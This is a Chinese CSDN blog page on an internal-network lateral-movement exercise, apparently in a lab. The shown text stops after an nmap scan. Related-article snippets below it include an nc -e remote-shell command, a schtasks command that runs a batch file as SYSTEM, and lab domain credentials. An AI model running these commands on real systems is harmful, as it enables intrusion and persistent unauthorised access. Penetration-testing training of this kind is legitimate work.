一次实战环境横向内网渗透记录

最新推荐文章于 2024-06-12 15:25:43 发布
最新推荐文章于 2024-06-12 15:25:43 发布
阅读量1.4k 收藏 22
点赞数 3
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_44284303/article/details/95049666
版权

渗透背景:
某反病毒公司即将推出一种新的反病毒产品,已知该公司员工Molos的电脑中有该反病毒产品的相关信息,目标是将该文件取出并不被发现

已有条件:
(1)你已经进入了内网中
(2)四个已知ip:
10.21.48.70
10.21.48.72
10.21.48.73
10.21.48.75
(3)攻击机kali:10.21.48.58
/内网渗透过程**/
1.信息收集
通过nmap进行信息收集,收集四个目标ip的端口信息和服务信息,包括安装的服务及版本,操作系统的版本

nmap -A ip

10.21.48.70:
10.21.48.70

10.21.48.72:
在这里插入图片描述

10.21.48.73:
在这里插入图片描述

10.21.48.75:

最低0.47元/天 解锁文章
0ss7key
关注
  • 3
    点赞
  • 22
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
工控安全职业证书技能实践:内网横向渗透测试与实战.pptx
07-11
工控安全职业证书技能实践:内网横向渗透测试与实战.pptx
内网渗透之linux到linux横向移动-ssh
m0_62207170的博客
05-09 1631
内网渗透之linux到linux横向移动-ssh
项目五linux 内网完整渗透测试实例笔记
qq_56426046的博客
01-29 1740
本靶场存在三个 flag 把下载到的虚拟机环境导入到虚拟机,本靶场需要把网络环境配置好。在 wdcp 生成秘钥保存下来 在 kali 设置权限 600你知道什么叫幸福嘛?幸福就是拍拍手。
内网渗透测试:内网横向移动基础总结
最新发布
从事厨房信息化行业,万能对接所有点餐系统,kds,智能控菜,酒店协调软件
06-12 150
Windows 7为跳板机用户名:douser密码:Dotest123Windows server 2008为域控(主机名:WIN-ENS2VR5TR3N)用户名:administrator密码:Liu78963攻击者已经获得了Windows7的权限,想要以Windows7作为跳板机进一步渗透内网的Windows server 2008,并且攻击者已经在跳板机上面通过socks代理等技术使自己可以访问到内网的Windows server 2008。
网络靶场实战-记一次大型内网渗透实践 【完结篇】
蛇矛实验室
12-13 1254
本场景基于某业务架构进行搭建,场景内包含了100余台主机以及20余子网,内置相关应用,包括Web服务、邮件服务、文件服务、OA服务等,但本场景多通过水坑攻击、钓鱼攻击、服务爆破等相关技术,其中包含了Chrome漏洞利用、Office漏洞利用等。通过本场景可以进行相关攻防技术训练。
DAY39:横向渗透
qq_49433473的博客
08-28 1763
哈希传递攻击概述(PTH) 、横向渗透横向移动工具合集使用及方法、Mimikatz 、Procdump+Mimikatz、psexec 、msf、CrackMapExec批量横向渗透、WMI 命令、Invoke-WmiCommand(PowerShell)
实战 | 手把手教你如何进行内网渗透
jennycisp的博客
06-25 1895
内网渗透主要是基于前期外围打点getshell的webserver,通过收集webserver上的信息,然后对其他内网主机进行口令上的攻击,当然也有一些基于漏洞的攻击。内网相关概念这里不再进行介绍,大家可以自行百度,诸如什么是域、域与工作组的区别、什么是DC、什么是AD等。当然,概念是生涩难懂的,结合实际环境会有助于理解。某内网靶场的详细教程:Vulnstack(一)内网渗透过程中经常会涉及到内网穿透,如何理解内网穿透以及端口转发、端口映射等相关知识可以参考:如何从零构建对内网穿透的理解。
工控安全职业证书技能实践:内网横向渗透测试与实战.docx
07-13
【工控安全职业证书技能实践:内网横向渗透测试与实战】 工控安全涉及的是工业控制系统中的网络安全,它要求专业人士具备识别、防范和应对安全威胁的能力。本实践课程旨在教授学员如何进行内网横向渗透测试,模拟...
#资源分享达人# 红蓝对抗之Windows内网渗透.zip
08-03
红蓝对抗则是内网渗透测试的一种实战演练形式,其中“红队”代表攻击者,尝试突破防御系统,而“蓝队”则扮演防御者的角色,设法防止或检测到这些攻击。 在Windows内网渗透中,以下是一些关键知识点: 1. **信息...
内网渗透经典文集
03-03
"小记一次渗透过程:一台工作站后面的大型内网!.pdf"可能讲述了从单一入口点进入并逐步控制整个内网的过程。这将强调单点突破的重要性,以及后续横向移动的策略。 "内网渗透以及安全问题的解决参考办法.pdf"可能...
一次攻防实战演习复盘总结.pdf
09-09
"一次攻防实战演习复盘总结" 一、知彼控制成本:反检测,反清理:三流分立 在攻防演习中,攻击者也是讲成本的,因此防守方最好的策略是:做的比其他防守方好一点点即可。攻击者一般:目标明确、步骤清晰、控制成本...
[内网] 横向渗透的几种方式
weixin_43586169的博客
07-28 4815
详细介绍了,横向渗透的黄金IPC$ & PTT & PTH & PTK,以及黄金票据与白银票据的方式
【内网安全】横向移动&Linux到Linux&SSH协议&遗留RSA密匙&Jenkins安全
今天是几号的博客
04-07 804
Exchange,LLMNR投毒,NTLM-Relay,Kerberos_TGS,GPO&DACL,域控提权漏洞,约束委派,数据库攻防,系统补丁下发执行,EDR定向下发执行等。strict_chain:如果下方设置了多个节点,必须都测试正确才可以使用。dynamic_chain:下方代理节点有一条测试正确也可以使用。172.16.250.30 8080开放 jenkins服务。成功解密后密码为:)uDvra{4UL^;172.16.250.30 8080开放。172.16.250.10 80开放。
网络攻防之内网安全横向渗透权限提升
weixin_46626737的博客
06-30 717
schtasks /create /s 目标IP /ru "SYSTEM" /tn adduser /sc DAILY /tr c:\add.bat /F创建对应任务。目标机器:nc 跳板机器IP 端口1 -e /bin/sh(linux)/c:\windows\system32\cmd.exe(windows)(攻击机):./ptunnel -p ip地址(外网机器) -lp 端口(本地端口) -da ip地址(目标。redesktop 127.0.0.1 端口(本地端口)
内网渗透-横向渗透2
huangyongkang666的博客
04-04 2881
内网渗透-横向渗透2 1.域横向 PTH&PTK&PTT 哈希票据传递 1.域横向移动 PTH 传递 PTH(pass the hash) #利用 lm 或 ntlm 的值进行的渗透测试 PTT(pass the ticket) #利用的票据凭证 TGT 进行的渗透测试 PTK(pass the key) #利用的 ekeys aes256 进行的渗透测试 1.PTH攻击介绍 ​ PTH 在内网渗透中是一种很经典的攻击方式,原理就是攻击者可以直接通过 LM Hash 和 NTLM Ha
渗透测试之内网渗透学习,超详细
z099164的博客
07-04 3794
渗透测试之内网渗透学习,超详细
真的敢耗时1个月10万字解决Linux内网渗透
aa119101的博客
05-25 3225
Linux虽然没有域环境,但是当我们拿到一台Linux 系统权限,难道只进行一下提权,捕获一下敏感信息就结束了吗?显然不只是这样的。本片文章将从拿到一个Linux shell开始,介绍Linux内网渗透技术,分为容器逃逸、Linux提权、Linux信息收集、Linux隧道技术、Linux横向移动、Linux权限维持、Linux痕迹清理几个部分。 容器逃逸 容器逃逸的应用主要是,拿到shell之后,发现是docker环境,要进一步渗透,就必须逃逸到宿主机。 容器逃逸方法见: https://www.cn
第5章域内横向移动分析及防御
willow_liang的博客
12-26 3887
第5章域内横向移动分析及防御 域内横向移动投不定在夏杂的内网攻击中被广泛使用的一种技术,尤其是在高级持续威胁(Advanced Persistent Threats,APT中。攻击者会利用该技术,以被攻陷的系统为跳板,访问其他域内主机,扩大资产范围(包括跳板机器中的文档和存储的凭证,以及通过跳板机器连接的数据库、域控制器或其他重要资产)。 通过此类攻击手段,攻击者最终可能获取域控制器的访问权限,甚至完全控制基于Windows操作系统的基础设施和与业务相关的关键账户。因此,必须使用强口令来保护特权用户不被
内网渗透-实战|手把手教你如何进行内网渗透
lza20001103的博客
04-14 2678
内网渗透-实战|手把手教你如何进行内网渗透
内网安全攻防实战:渗透测试与法规解析
"内网安全攻防渗透测试实战指南.pptx" 内网安全攻防是信息安全领域的一个重要部分,特别是在企业、政府机构和其他组织中,内网通常包含大量敏感数据和关键系统。渗透测试是对内网安全性进行评估的一种方法,目的是...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值